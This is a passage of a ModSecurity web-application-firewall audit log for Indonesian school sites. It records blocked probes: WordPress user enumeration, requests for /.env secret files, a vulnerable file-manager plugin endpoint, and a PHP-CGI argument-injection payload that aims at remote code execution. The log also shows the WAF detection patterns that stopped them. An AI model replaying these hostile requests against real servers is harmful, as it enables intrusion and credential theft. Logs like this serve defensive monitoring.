"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030982256 3473 (- - -) Stopwatch2: 1748399030982256 3473; combined=2203, p1=444, p2=1616, p3=27, p4=91, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91148c00-Z-- --f218bd08-A-- [28/May/2025:09:23:52 +0700] aDZzuPnnEwDNUSjDseIDTgAAAIk 103.236.140.4 42654 103.236.140.4 8181 --f218bd08-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f218bd08-C-- ƒ•examplecom --f218bd08-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --f218bd08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399032809743 4642 (- - -) Stopwatch2: 1748399032809743 4642; combined=2794, p1=597, p2=2077, p3=43, p4=42, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f218bd08-Z-- --7204e810-A-- [28/May/2025:09:26:51 +0700] aDZ0aw3r-0gDryHAyD-v6QAAAEM 103.236.140.4 44852 103.236.140.4 8181 --7204e810-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 104.244.79.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 104.244.79.61 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --7204e810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7204e810-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748399211805591 2247 (- - -) Stopwatch2: 1748399211805591 2247; combined=1030, p1=322, p2=677, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7204e810-Z-- --280e945c-A-- [28/May/2025:09:40:53 +0700] aDZ3tRwBHP_x2VCWa05vagAAAMk 103.236.140.4 55118 103.236.140.4 8181 --280e945c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.94.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.94.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --280e945c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --280e945c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748400053647521 1009 (- - -) Stopwatch2: 1748400053647521 1009; combined=414, p1=373, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280e945c-Z-- --4cb9570d-A-- [28/May/2025:10:34:03 +0700] aDaEK_nnEwDNUSjDseIQ0AAAAIg 103.236.140.4 46258 103.236.140.4 8181 --4cb9570d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.60.252.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.60.252.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4cb9570d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb9570d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748403243118191 3003 (- - -) Stopwatch2: 1748403243118191 3003; combined=1268, p1=406, p2=833, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb9570d-Z-- --ec91720d-A-- [28/May/2025:10:35:40 +0700] aDaEjOszXCullgn3bbGhNwAAAAc 103.236.140.4 47794 103.236.140.4 8181 --ec91720d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec91720d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec91720d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748403340052791 755 (- - -) Stopwatch2: 1748403340052791 755; combined=290, p1=255, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec91720d-Z-- --2085ac37-A-- [28/May/2025:10:41:32 +0700] aDaF7OszXCullgn3bbGh4wAAABA 103.236.140.4 50632 103.236.140.4 8181 --2085ac37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.163.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.163.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2085ac37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2085ac37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748403692570119 2807 (- - -) Stopwatch2: 1748403692570119 2807; combined=1255, p1=436, p2=789, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2085ac37-Z-- --ef30a96c-A-- [28/May/2025:11:02:13 +0700] aDaKxfnnEwDNUSjDseIR4gAAAIw 103.236.140.4 51786 103.236.140.4 8181 --ef30a96c-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 169224220 --ef30a96c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ef30a96c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404933242200 2734 (- - -) Stopwatch2: 1748404933242200 2734; combined=1501, p1=400, p2=1075, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef30a96c-Z-- --28d14444-A-- [28/May/2025:11:02:13 +0700] aDaKxfnnEwDNUSjDseIR4wAAAI8 103.236.140.4 51786 103.236.140.4 8181 --28d14444-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 163570859 --28d14444-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28d14444-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404933343228 2853 (- - -) Stopwatch2: 1748404933343228 2853; combined=1480, p1=349, p2=1103, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28d14444-Z-- --61f2b65e-A-- [28/May/2025:11:02:33 +0700] aDaK2eszXCullgn3bbGiZAAAABA 103.236.140.4 51840 103.236.140.4 8181 --61f2b65e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.19.138.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.19.138.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --61f2b65e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61f2b65e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404953158078 3414 (- - -) Stopwatch2: 1748404953158078 3414; combined=1484, p1=515, p2=924, p3=0, p4=0, p5=44, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61f2b65e-Z-- --064bf31e-A-- [28/May/2025:11:03:34 +0700] aDaLFg3r-0gDryHAyD--_QAAAE8 103.236.140.4 52038 103.236.140.4 8181 --064bf31e-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 124.243.188.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.243.188.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24 Proxy-Connection: close --064bf31e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064bf31e-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748405014026064 2902 (- - -) Stopwatch2: 1748405014026064 2902; combined=1072, p1=497, p2=541, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064bf31e-Z-- --649c3246-A-- [28/May/2025:11:14:52 +0700] aDaNvPnnEwDNUSjDseISDQAAAIM 103.236.140.4 52106 103.236.140.4 8181 --649c3246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.17.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --649c3246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --649c3246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748405692628070 2984 (- - -) Stopwatch2: 1748405692628070 2984; combined=1300, p1=431, p2=834, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --649c3246-Z-- --201fbb7a-A-- [28/May/2025:11:29:12 +0700] aDaRGA3r-0gDryHAyD-_HgAAAEE 103.236.140.4 52410 103.236.140.4 8181 --201fbb7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.232.225.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.232.225.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --201fbb7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --201fbb7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748406552837293 3678 (- - -) Stopwatch2: 1748406552837293 3678; combined=1615, p1=542, p2=1037, p3=0, p4=0, p5=36, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --201fbb7a-Z-- --01dc1767-A-- [28/May/2025:11:32:00 +0700] aDaRwOszXCullgn3bbGijQAAAAo 103.236.140.4 52586 103.236.140.4 8181 --01dc1767-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.137.188.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.137.188.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --01dc1767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01dc1767-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748406720627939 2712 (- - -) Stopwatch2: 1748406720627939 2712; combined=1227, p1=426, p2=771, p3=0, p4=0, p5=29, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01dc1767-Z-- --787d2d15-A-- [28/May/2025:11:46:18 +0700] aDaVGhwBHP_x2VCWa05-EAAAAMI 103.236.140.4 52714 103.236.140.4 8181 --787d2d15-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --787d2d15-C-- --787d2d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787d2d15-E-- --787d2d15-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748407578952917 4252 (- - -) Stopwatch2: 1748407578952917 4252; combined=2585, p1=477, p2=2068, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787d2d15-Z-- --18f27b24-A-- [28/May/2025:11:47:43 +0700] aDaVbxwBHP_x2VCWa05-EQAAAM0 103.236.140.4 52720 103.236.140.4 8181 --18f27b24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.240.193.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.240.193.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --18f27b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18f27b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748407663269917 3348 (- - -) Stopwatch2: 1748407663269917 3348; combined=1513, p1=523, p2=958, p3=0, p4=0, p5=31, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18f27b24-Z-- --a8a91277-A-- [28/May/2025:11:59:17 +0700] aDaYJRwBHP_x2VCWa05-IgAAANY 103.236.140.4 52812 103.236.140.4 8181 --a8a91277-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a8a91277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a91277-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748408357275901 726 (- - -) Stopwatch2: 1748408357275901 726; combined=280, p1=242, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a91277-Z-- --8e474d09-A-- [28/May/2025:12:12:53 +0700] aDabVfnnEwDNUSjDseISuAAAAJE 103.236.140.4 53938 103.236.140.4 8181 --8e474d09-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8e474d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e474d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 